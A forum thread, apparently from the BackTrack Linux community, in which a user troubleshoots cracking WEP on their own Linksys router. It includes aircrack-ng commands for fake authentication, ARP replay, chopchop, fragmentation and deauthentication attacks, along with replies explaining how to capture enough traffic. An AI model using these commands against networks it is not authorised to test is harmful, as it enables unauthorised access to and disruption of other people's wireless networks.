Cant get PRGA for WEP crack...

Cant get PRGA for WEP crack...


"airmon-ng start wlan0"
"airodump-ng mon0"

ESSID: Linksys01
BSSID: xx:xx:xx:xx:xx:xx
Channel: 6

"iwconfig wlan0 channel 6"
"iwconfig mon0 channel 6"

"airodump-ng mon0 -c 6 --bssid xx:xx:xx:xx:xx:xx"

...sniffing starts

"aireplay-ng -1 0 -e Linksys01 -a xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm"

"Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)"

[Can see my MAC show up under stations on airodump-ng sniff]
[AUTH changes to OPN]

---------------------------------

At this point I'm confused/stuck... i perform "ls" in /root. but no .xor file.

I tried arpreply attack...

"aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0"

It will continue to read packets and go no where.

I tried a Chop Chop...

"aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"

It will continue to read packets and go no where.

I tried fragmentation...

"aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"

It will continue to read packets and go no where.

Tested packet injection (works). Tried keeping my mac the same and changing it. I even tried restarting and rebooting my VMware. Same thing. I find it odd that AUTH never changes to SKA.


Any Ideas?:confused:


===============================================
ROUTER: Linksys WRtT54G w/DD-WRT v24 sp2
VMware player 5.0.0 build-812388 (4gig ram, 2 processors, 30 gig hard drive, Bridged network adapter)
Back Track 5r3
Alpha AWUS036H
IBM x230

Many of these aireplay attacks will prompt you to confirm the use of a packet before it is used for an attack. Since this is not happening for any of your attacks, I would suggest that there are no data packets being broadcast. When conducting these exercises, I would recommend having at least one wired or wireless client on the network to generate traffic (for example by pinging non-existing hosts to generate ARPs).

Quote:

---

Originally Posted by Daveneedlinux

Cant get PRGA for WEP crack...


"airmon-ng start wlan0"
"airodump-ng mon0"

ESSID: Linksys01
BSSID: xx:xx:xx:xx:xx:xx
Channel: 6

"iwconfig wlan0 channel 6"
"iwconfig mon0 channel 6"

"airodump-ng mon0 -c 6 --bssid xx:xx:xx:xx:xx:xx"

...sniffing starts

"aireplay-ng -1 0 -e Linksys01 -a xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm"

"Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)"

[Can see my MAC show up under stations on airodump-ng sniff]
[AUTH changes to OPN]

---------------------------------

At this point I'm confused/stuck... i perform "ls" in /root. but no .xor file.

I tried arpreply attack...

"aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0"

It will continue to read packets and go no where.

I tried a Chop Chop...

"aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"

It will continue to read packets and go no where.

I tried fragmentation...

"aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"

It will continue to read packets and go no where.

Tested packet injection (works). Tried keeping my mac the same and changing it. I even tried restarting and rebooting my VMware. Same thing. I find it odd that AUTH never changes to SKA.


Any Ideas?:confused:


===============================================
ROUTER: Linksys WRtT54G w/DD-WRT v24 sp2
VMware player 5.0.0 build-812388 (4gig ram, 2 processors, 30 gig hard drive, Bridged network adapter)
Back Track 5r3
Alpha AWUS036H
IBM x230

---

Yeah start using automated Wifi crackers; hackpack's airpwn, Gerix, etc. Easy, simple, fast.

I don't know your ultimate goal, but here is a thread that may help a bit.

http://www.backtrack-linux.org/forum...ad.php?t=42602

Thanks.

I didn't have a computer on the network. I have set up a laptop with a wireless connection, and just sent at continuous ping to the routers IP. New problem.

Arp-reply
----------

Read {packets} packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

(will continue to do this forever untill i Ctrl+c)

Fragmentation
--------------

aireplay-ng -5 -b {BSSID} mon0

Finds a packet

I select "y" to use packet
"Sending fragmented packet"
"Got a deauthentication packet"
"not enough acks, repeating...
"Trying a LLC NULL packet"

It will repeat this till "still nothing, trying another packet"

and i repeat the process.

Chop Chop
----------

aireplay-ng -4 -b {BSSID} mon0

Finds a packet

I select "y" to use packet

got several deauthenticaiton packets - pauseing 3 seconds for reconnection
got several deauthenticaiton packets - pauseing 3 seconds for reconnection
got several deauthenticaiton packets - pauseing 3 seconds for reconnection

The chopchop attack appears to have failed

Taking a second look at some of the commands you've been using, I've noticed you are omitting the -w argument in airodump. This tells airodump to write all captured data to a file, which you will need to do if you want to obtain the WEP key later on. This isn't a solution to your problem - but one you will run into later.

Pinging the router IP continuously will unlikely generate new ARPs, since the relevant details for this host are already stored in your clients ARP table. Try pinging an address that is not being used, this will cause a new ARP as the client tries to establish an IP-MAC Address relationship for that host (even though it doesn't exist).

Make sure you are already sniffing and listening for ARPs - as soon as you try and ping this non-existent host, BT should detect the ARP.

SOLVED:

Thank you rastamouse, I did forget to incorporate -w into my commands. Also The problem seemed to be i wasn't performing a --deauth on the router

"aireplay-ng -0 5 -a {BSSID} mon0"

Once I had my airdump-ng locked onto the channel, and performed a --deauth, I was able to sniff the correct packets.